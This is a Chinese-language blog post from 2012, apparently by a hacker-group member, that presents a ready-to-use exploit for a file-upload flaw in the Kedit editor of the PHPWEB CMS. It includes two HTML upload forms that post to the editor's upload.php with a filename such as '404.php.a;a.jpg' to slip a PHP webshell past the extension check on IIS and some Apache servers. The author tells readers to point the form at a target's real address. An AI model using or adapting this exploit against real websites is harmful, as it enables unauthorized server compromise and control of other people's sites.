注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

龙少'Blog

 

 
 
 

日志

 
 

PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码  

2012-08-14 15:42:27|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

话说有套CMS叫做PHPWEB,在版本V1.3.15的后台有一个有漏洞的Kedit
看了kedit.php源码,虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
换句话说,xxxx.php;xxx.gif这样的文件也是允许的,只要服务器是IIS就拿到webshell
网上已经被人转载烂了,说kedit可以上传xxx.php;xx.gif,并且给了POST包,是一句话。
一来这个网上流传的代码,已经被转载烂了,早就不完整了,二来看来作者对http的了解似乎也仅限于工具抓包这个层面,对IE如何POST数据包的工作以 及脚本似乎并不了解。我遇到了一个后台kedit以后,重新构造了一个POST数据包,是用html文件的,很简单的一个程序,而且对一部分Apache 程序也有效
作者:YoCo Smart
来自:Silic Group Hacker Army

将下列代码保存为xx.html,打开后选择文件上传即可
注:第一行的action改名为真是的kedit地址


<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxxx.com/kedit/upload_cgi/upload.php">
<input type="hidden" name="fileName" id="fileName" value="404.php.a;a.jpg" />
<input type="hidden" name="attachPath" id="fileName" value="news/pics/" />
 
<select id="imageType" onchange="javascript:parent.KindImageType(this.value);document.getElementById('KE_IMAGEsubmitButton').focus();">
<option value="1" selected="selected">本地</option>
<option value="2">远程</option>
</select>
 
<input type="text" id="imgLink" value="http://" maxlength="255" style="width:95%;border:1px solid #555555;display:none;" />
<input type="file" name="fileData" id="imgFile" size="14" style="border:1px solid #555555;" onclick="javascript:document.getElementById('imgLink').value='http://';" /></td>
 
<input type="text" name="imgTitle" id="imgTitle" value="" maxlength="100" style="width:95%;border:1px solid #555555;" />
<input type="text" name="imgWidth" id="imgWidth" value="0" maxlength="4" style="width:40px;border:1px solid #555555;" />
<input type="text" name="imgHeight" id="imgHeight" value="0" maxlength="4" style="width:40px;border:1px solid #555555;" />
<input type="text" name="imgBorder" id="imgBorder" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />
<select id="imgAlign" name="imgAlign">
<option value="">对齐方式</option>
<option value="baseline">baseline</option>
<option value="top">top</option>
<option value="middle">middle</option>
<option value="bottom">bottom</option>
<option value="texttop">texttop</option>
<option value="absmiddle">absmiddle</option>
<option value="absbottom">absbottom</option>
<option value="left">left</option>
<option value="right">right</option>
</select>
<input type="text" name="imgHspace" id="imgHspace" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />
<input type="text" name="imgVspace" id="imgVspace" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />
<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="确定" style="border:1px solid #555555;background-color:#AAAAAA;" /></form>

上传以后只需要右键查看源代码即可得到上传后的地址
上面的部分是直接从编辑器上面拷贝修改的,其实还可以这样的:


<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="404.php.a;a.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>

这是精简过的,上传后的文件名可以更改

  评论这张
 
阅读(1681)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017